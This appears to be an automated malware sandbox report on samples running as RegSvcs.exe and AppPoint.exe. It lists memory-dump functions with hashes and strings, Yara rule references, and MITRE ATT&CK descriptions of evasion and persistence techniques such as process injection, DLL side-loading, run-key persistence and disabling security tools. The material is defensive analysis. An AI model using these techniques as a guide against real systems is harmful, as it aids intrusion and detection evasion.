API String ID:
Opcode ID: 31e5041645558fb3f8b4c195311ff9c38a1c9a9f461d31ec07b72d19d2ad8fcf
Instruction ID: 7b417f9d7426ae52c701bea451991605fc32ed071c06df5f85b1ea6f36cbd518
Opcode Fuzzy Hash: 31e5041645558fb3f8b4c195311ff9c38a1c9a9f461d31ec07b72d19d2ad8fcf
Instruction Fuzzy Hash: C2C012B00012008ADF189F58A08C6583A51EB42328B301E499018891C1C672C543D7C1

Function 05004230 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35bed1b756fc2e82c9bd1a921412d0305eb1b717f39bf97fb9fffa7b974ba44f
Instruction ID: a54397bd04f5af4e48c84dd469db325e7a551a43b994a31cdb8892bd5cc4d4e3
Opcode Fuzzy Hash: 35bed1b756fc2e82c9bd1a921412d0305eb1b717f39bf97fb9fffa7b974ba44f
Instruction Fuzzy Hash:

Non-executed Functions

Function 063DB2D0 Relevance: 10.3, Strings: 8, Instructions: 251COMMON

Download Yara Rule

Strings

$fq, xrefs: 063DB43F
$fq, xrefs: 063DB433
$fq, xrefs: 063DB3DE
$fq, xrefs: 063DB464
$fq, xrefs: 063DB470
$fq, xrefs: 063DB4AC
$fq, xrefs: 063DB4A0
$fq, xrefs: 063DB3D2

Memory Dump Source

Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
API String ID: 0-3929485403
Opcode ID: 7ed2ae9292bf24b1fbf16185c1187ca45337e201838575d96714c19456964a72
Instruction ID: df68a20fe3254f0ba13a032eb5e004fdd6595ffdcd6b1e44c0e8eb8afcecdc35
Opcode Fuzzy Hash: 7ed2ae9292bf24b1fbf16185c1187ca45337e201838575d96714c19456964a72
Instruction Fuzzy Hash: 8D91AFB1E00209DFEB54EBB5E995BAFB6F6AF84340F118029E4029B291DF349C45DBD1

Function 063D74C0 Relevance: 9.2, Strings: 7, Instructions: 437COMMON

Download Yara Rule

Strings

$fq, xrefs: 063D7746
.5~q, xrefs: 063D7512
$fq, xrefs: 063D77D6
$fq, xrefs: 063D7A03
$fq, xrefs: 063D79F7
$fq, xrefs: 063D77CA
$fq, xrefs: 063D7987

Memory Dump Source

Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: .5~q$$fq$$fq$$fq$$fq$$fq$$fq
API String ID: 0-1301248726
Opcode ID: b5ce65416615fd98335fe9d4deee9c18f8da236d519e2729af97baa45cdb7e16
Instruction ID: ae50a975b9dcfc584dd285982903e4cffcbc88ecc6f670beaa4cf4953af3c71b
Opcode Fuzzy Hash: b5ce65416615fd98335fe9d4deee9c18f8da236d519e2729af97baa45cdb7e16
Instruction Fuzzy Hash: 59F14A31B002098FDB58EBB9D855A6EB7F2BF84340F20842DD5069B3A6DE35DD46CB91

Function 063DC8A8 Relevance: 7.7, Strings: 6, Instructions: 202COMMON

Download Yara Rule

Strings

$fq, xrefs: 063DCA5B
$fq, xrefs: 063DCA8F
$fq, xrefs: 063DCA83
$fq, xrefs: 063DCA4F
$fq, xrefs: 063DCAC3
$fq, xrefs: 063DCAB7

Memory Dump Source

Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq$$fq$$fq
API String ID: 0-1582559945
Opcode ID: 2078ca4ad95cf16ce57ebc416f372e4a6d59ed25dcd01603ef4aa3f5b9a5ddbe
Instruction ID: 879724b3506c45f2f9075123d853dea178f51cf8438700cf35ec4fdf8c1a8105
Opcode Fuzzy Hash: 2078ca4ad95cf16ce57ebc416f372e4a6d59ed25dcd01603ef4aa3f5b9a5ddbe
Instruction Fuzzy Hash: F071A232F202198FDB58DFA8E54056EB7AAEF85340F105569D406EB281DB31ED46CBC1

Function 063D8990 Relevance: 5.3, Strings: 4, Instructions: 300COMMON

Download Yara Rule

Strings

$fq, xrefs: 063D8C22
$fq, xrefs: 063D8C16
$fq, xrefs: 063D8C8D
$fq, xrefs: 063D8C81

Memory Dump Source

Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq
API String ID: 0-2113499236
Opcode ID: a0c1f03032b88d582bdb58e437393b5d4b33b2a31a2339c940119e2071f76a87
Instruction ID: da88413cf2dbc8401686e5fd05690e7d68570df2179837d7d3a7cc58f95f6bb3
Opcode Fuzzy Hash: a0c1f03032b88d582bdb58e437393b5d4b33b2a31a2339c940119e2071f76a87
Instruction Fuzzy Hash: 92B15E31E102088FDB58EBA9D8906AEB7B2FF84340F248429D505DB395DE35ED86CB91

Function 063D8DE0 Relevance: 5.2, Strings: 4, Instructions: 192COMMON

Download Yara Rule

Strings

$fq, xrefs: 063D8E7B
LRfq, xrefs: 063D8F4C
$fq, xrefs: 063D8E6F
LRfq, xrefs: 063D8EE6

Memory Dump Source

Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: LRfq$LRfq$$fq$$fq
API String ID: 0-1810675050
Opcode ID: cf8466cc3f932a89ced860b721acb2fb9616b765d345af060b386c4a803eeb3d
Instruction ID: d4553fdc2acb33d426d39c1c5f75bb7abe2429269cb37ef85548dc31abd89f42
Opcode Fuzzy Hash: cf8466cc3f932a89ced860b721acb2fb9616b765d345af060b386c4a803eeb3d
Instruction Fuzzy Hash: 2861D431B002058FDB58EB78E851B6EB3E6FF88740F108569E506AB3A5DE31ED058BD1

Function 063DB698 Relevance: 5.2, Strings: 4, Instructions: 171COMMON

Download Yara Rule

Strings

$fq, xrefs: 063DB867
$fq, xrefs: 063DB7D9
$fq, xrefs: 063DB896
$fq, xrefs: 063DB832

Memory Dump Source

Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq
API String ID: 0-2113499236
Opcode ID: c922071be2e59c2fe062013ff42770cf31858e17a5ec5cf781cf7d0e6cc8b5ec
Instruction ID: e066b5abaf3300401f45880431930817ec16b628b98722d7c051d57d0f592319
Opcode Fuzzy Hash: c922071be2e59c2fe062013ff42770cf31858e17a5ec5cf781cf7d0e6cc8b5ec
Instruction Fuzzy Hash: 1F51AD71F102099BDB64EB68E8806AEB3A2EF89340F11452AE407DB391DE35DC46CBD1

Analysis Process: AppPoint.exePID: 6048, Parent PID: 2580COMMON

Executed Functions

Function 02FE1340 Relevance: 1.8, Strings: 1, Instructions: 580COMMON

Download Yara Rule

Strings

8jq, xrefs: 02FE1B75

Memory Dump Source

Source File: 00000006.00000002.1795225827.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fe0000_AppPoint.jbxd

Similarity

API ID:
String ID: 8jq
API String ID: 0-3286795621
Opcode ID: ead330bf1d6415e448304a9fc7693294ddc601836c91f1f1e6d0c1b6f8472159
Instruction ID: b7c325f28c95b716490f4828e8c62b675685e5a25bb31a701efb8c301a84fc52
Opcode Fuzzy Hash: ead330bf1d6415e448304a9fc7693294ddc601836c91f1f1e6d0c1b6f8472159
Instruction Fuzzy Hash: 96327F34B00206CFCB15DF7AD59062B73B6FB89345B148968C51A8B399EB39ED81CF91

Function 02FE1230 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

tPfq, xrefs: 02FE12F7

Memory Dump Source

Source File: 00000006.00000002.1795225827.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fe0000_AppPoint.jbxd

Similarity

API ID:
String ID: tPfq
API String ID: 0-3170913260
Opcode ID: 74a7ffc66b76a029addd6db240236afe4f80926a3e9af5a098cc585259e6d673
Instruction ID: 49b46cc661d96bde5e9e840908ec4bd216b8ad3876898c93de4f8e6fb525816d
Opcode Fuzzy Hash: 74a7ffc66b76a029addd6db240236afe4f80926a3e9af5a098cc585259e6d673
Instruction Fuzzy Hash: 7D3126707412208FCB5AAB78C49881D7BF2AF8A71536108B9E506CF3B2DE35DC42CB80

Function 02FE1240 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

tPfq, xrefs: 02FE12F7

Memory Dump Source

Source File: 00000006.00000002.1795225827.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fe0000_AppPoint.jbxd

Similarity

API ID:
String ID: tPfq
API String ID: 0-3170913260
Opcode ID: 8b712ce31741677773f0f16beeec81000c3fdebe66c217175ad9d9d38e4dacfe
Instruction ID: 91e13538b665bff907ec64fedd9e497309dd13fd260e5800e2f01440b7511d51
Opcode Fuzzy Hash: 8b712ce31741677773f0f16beeec81000c3fdebe66c217175ad9d9d38e4dacfe
Instruction Fuzzy Hash: 142128747402218FCB59AB79C49881D77E2EF8A71536118B8E506CF371DE36DC42CB80

Function 02FE0BC0 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1795225827.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fe0000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 986477aa1db286dd4ff4b8468fdfb7b3644487d2ea68428e334be6c3b3fab07f
Instruction ID: a900603364de16c48972c709f91dcd2cef8322c3ea859e111e9a7286ea0eadd7
Opcode Fuzzy Hash: 986477aa1db286dd4ff4b8468fdfb7b3644487d2ea68428e334be6c3b3fab07f
Instruction Fuzzy Hash: B281C035A003058FCB269BB5C45869EBBB2EF88310F18896DD517AB364DF75AD85CF40

Function 02FE1C00 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1795225827.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fe0000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6dab9e51ea34b16558db985a10ea2ee11009e3fce022d9a1ff042b3b10e84f4
Instruction ID: 29fa1392cc217695fe549da3f0acbefa4169ba0674514a339bab344b00a16980
Opcode Fuzzy Hash: b6dab9e51ea34b16558db985a10ea2ee11009e3fce022d9a1ff042b3b10e84f4
Instruction Fuzzy Hash: 5A11CE76E002458FCB05DFB5D9408AEFBB1FF8920071081AAE519DB261E7349844CFA0

Function 02FE1C10 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1795225827.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fe0000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e0ae8c87e38258c332a7d26039b0124596f277bab87640e4b10bde48ba5c0c3
Instruction ID: 9030a69a80acb2a5e134475e65b07359862325fab30180e63c76f0c76c0c8c46
Opcode Fuzzy Hash: 8e0ae8c87e38258c332a7d26039b0124596f277bab87640e4b10bde48ba5c0c3
Instruction Fuzzy Hash: BE01407AE002059FCB44DFE6D9448ABFBB5FF89210710816AE51997220E774A955CFA0

Function 02FE0880 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1795225827.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fe0000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5da4ea1e4aa1a767fef2b411c28aad42442647d445d6c26ac94a6387b0874162
Instruction ID: cf5b8a675a199a81da1da4b31fb3da708b48a0a00488d56c5042603c3ce319c2
Opcode Fuzzy Hash: 5da4ea1e4aa1a767fef2b411c28aad42442647d445d6c26ac94a6387b0874162
Instruction Fuzzy Hash: 69F04F72D0E3D45FCB53877458541997FF09D07210B0945EFC5C9DB193E2244A09C763

Function 02FE0F9D Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1795225827.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fe0000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80a3b3190af909bf1ab24889d5ea067cfa75cbc851ad9c37f5a23f0f44384e73
Instruction ID: 4d3c8cf03f633af279ecf5062bed5e4f4f4e8d8b587c07aef8bb477f98ee6e15
Opcode Fuzzy Hash: 80a3b3190af909bf1ab24889d5ea067cfa75cbc851ad9c37f5a23f0f44384e73
Instruction Fuzzy Hash: B1F01CB5A00309CFEF25DB64C1587AE7BB0AB48754F240868D507AB260CBB88D84CB61

Function 02FE1AE0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1795225827.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fe0000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd0056919caf69c5e92dec43eb9a2aa7d8c601fd5dc195c54bc9da33f11b8378
Instruction ID: dc80031f05cd6f005680dc79d85c8c5f158632d17864e8be2a62fa27b990b677
Opcode Fuzzy Hash: bd0056919caf69c5e92dec43eb9a2aa7d8c601fd5dc195c54bc9da33f11b8378
Instruction Fuzzy Hash: DED05B35700214DFC710DB7AE949A467778EF09651F5040A5EA09CB350EB71DD14CBD1

Function 02FE08A8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1795225827.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fe0000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec95af90b6b0130c921bbd14bda71652296728fafe8759259490d166aa689a21
Instruction ID: 9ae6c22dca59bdf49e6e6c5875038713a088fcdb02c54e4c071adee5df2cb0cb
Opcode Fuzzy Hash: ec95af90b6b0130c921bbd14bda71652296728fafe8759259490d166aa689a21
Instruction Fuzzy Hash: 66D067B2D05219AF8F50EFB999055DEBBF8EE09250B104566D91AE3204E6709B14CBE1

Analysis Process: AppPoint.exePID: 5012, Parent PID: 2580COMMON

Executed Functions

Function 01241340 Relevance: 1.9, Strings: 1, Instructions: 604COMMON

Download Yara Rule

Strings

8jq, xrefs: 01241B75

Memory Dump Source

Source File: 00000009.00000002.1878168345.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1240000_AppPoint.jbxd

Similarity

API ID:
String ID: 8jq
API String ID: 0-3286795621
Opcode ID: 1f5e44f5dfc96554b08a06569e52d3385a12f68fea4db1f1ffc1390bf270cd16
Instruction ID: 5c5d1f647b0396b18255b4ec4d8a8260a2ecff5dd1e687b5036767f8e8a5ba60
Opcode Fuzzy Hash: 1f5e44f5dfc96554b08a06569e52d3385a12f68fea4db1f1ffc1390bf270cd16
Instruction Fuzzy Hash: 04325A35B14202CFDB18EF74D59466A7BB6BB88344B14892CC5168B39DEB35EC82CF90

Function 01241230 Relevance: 1.3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

tPfq, xrefs: 012412F7

Memory Dump Source

Source File: 00000009.00000002.1878168345.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1240000_AppPoint.jbxd

Similarity

API ID:
String ID: tPfq
API String ID: 0-3170913260
Opcode ID: f3b9997820a1643e6b7df43b7099997f6742d66e283566683d5a3adf4300b6bf
Instruction ID: 7a3afd85ae226679d308cd10724c2142749711beb6178d6ba46963d17b44ef0a
Opcode Fuzzy Hash: f3b9997820a1643e6b7df43b7099997f6742d66e283566683d5a3adf4300b6bf
Instruction Fuzzy Hash: 5D31F5717402118FCB59AB78D49896D7BE2AF8A71536118B8E506CF771DE36DC42CB80

Function 01241240 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

tPfq, xrefs: 012412F7

Memory Dump Source

Source File: 00000009.00000002.1878168345.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1240000_AppPoint.jbxd

Similarity

API ID:
String ID: tPfq
API String ID: 0-3170913260
Opcode ID: 87730d2bd11ca7c4f0d42f60550031d56a4d348a26579cc374290938e5d8bed4
Instruction ID: 0b1f9831450fb2a464e51d7f6551e4bcac3c1fb1e77707173a007a2683ad862e
Opcode Fuzzy Hash: 87730d2bd11ca7c4f0d42f60550031d56a4d348a26579cc374290938e5d8bed4
Instruction Fuzzy Hash: B721E6757412118FCB5CAB78C49881D7BE6AF8A71536118B8E506CF771DE36EC42CB80

Function 01240BC0 Relevance: .3, Instructions: 338COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1878168345.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1240000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e64dbd1706a89d9141511b1cf85300c26e4b8e61a53dacf022d4041d76cee6b9
Instruction ID: 3769317892b49e204bf1b938962a35ac444b9eb80881ba2deb223ab867e58e60
Opcode Fuzzy Hash: e64dbd1706a89d9141511b1cf85300c26e4b8e61a53dacf022d4041d76cee6b9
Instruction Fuzzy Hash: A281BF35A10305CFCB29AB74C4486AEBBB2EF88300F14856DE6569B768DB75ACC5CB40

Function 01241C00 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1878168345.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1240000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 982e4f6f0a97defa4c6f782f3ec620e890ec3bc4de5fb61954c77deb387a3254
Instruction ID: d7766ea315d8e054db096f6c9aa0e21e7f27f1142127a602089413b00bbb6af0
Opcode Fuzzy Hash: 982e4f6f0a97defa4c6f782f3ec620e890ec3bc4de5fb61954c77deb387a3254
Instruction Fuzzy Hash: 98117C76E002069FCB45EFB4D8408EABBF5FF8931071186AAE515EB225E7709905CFA0

Function 01241C10 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1878168345.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1240000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21d751379d00c7bbd9187ade4f5bcd0f806d199246f2ec3a2d7eed326d7ffb51
Instruction ID: 07d196788e8098340d375566c91b9af8f1815dab18d02c915b3d73380487c781
Opcode Fuzzy Hash: 21d751379d00c7bbd9187ade4f5bcd0f806d199246f2ec3a2d7eed326d7ffb51
Instruction Fuzzy Hash: EB014076E002069FCB44FFA4D9448AAFBF5FF89310710856AE51597324E770A915CF90

Function 01240880 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1878168345.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1240000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e975f2c6bf2d352abeb4e8916defba43bb5939d03c7d9e509e7504410d1b3775
Instruction ID: 558a52b20d117b88b2efbb83ccd7102fcad34e9a2dc21bb7c3359bbd14dffe79
Opcode Fuzzy Hash: e975f2c6bf2d352abeb4e8916defba43bb5939d03c7d9e509e7504410d1b3775
Instruction Fuzzy Hash: 06F04F70E093559FCB429FB8A9111DE7FF0EE86220B1600BBD5C5D7512D2780D95CBA2

Function 01240F9D Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1878168345.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1240000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba77cd7f949bace5cec58d1afbf679046275aeb8df1a17964f547153b8246677
Instruction ID: 46370badb0ec1f6a6f79b193386855e850c69a4598dcb7e410a87b04f5096786
Opcode Fuzzy Hash: ba77cd7f949bace5cec58d1afbf679046275aeb8df1a17964f547153b8246677
Instruction Fuzzy Hash: B8F01C74910316CFDB28DB68C1597AE7BB0AB48704F250868D506AB261DBB498C4CB50

Function 01241AE0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1878168345.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1240000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d4418979e2b42a585241073d7099c2446e6020af1aa6623e70e6ba94d813c02
Instruction ID: e2bcf7986adaa0bb2432ca781ce7eb1da6385a5423ee09b39862dd28a2c2d2d4
Opcode Fuzzy Hash: 4d4418979e2b42a585241073d7099c2446e6020af1aa6623e70e6ba94d813c02
Instruction Fuzzy Hash: EDD05E367103149FC724EB79E949A963FB8EF09611F5040A9EA08CB394EB72EC14CBD1

Function 012408A8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1878168345.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1240000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d065e4e7d73ca972603b49835d519f4e9d354c49b8a64a51cd9ba67e96e4773
Instruction ID: 2a671375843217ba006040ea2558b6faa9db8dd5129bc4b6fc8c3d896821c84d
Opcode Fuzzy Hash: 5d065e4e7d73ca972603b49835d519f4e9d354c49b8a64a51cd9ba67e96e4773
Instruction Fuzzy Hash: 3BD017B1D01229AF8B40EFB899051EEBBF8EE08250B000576D919E3200E2704A508BD1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

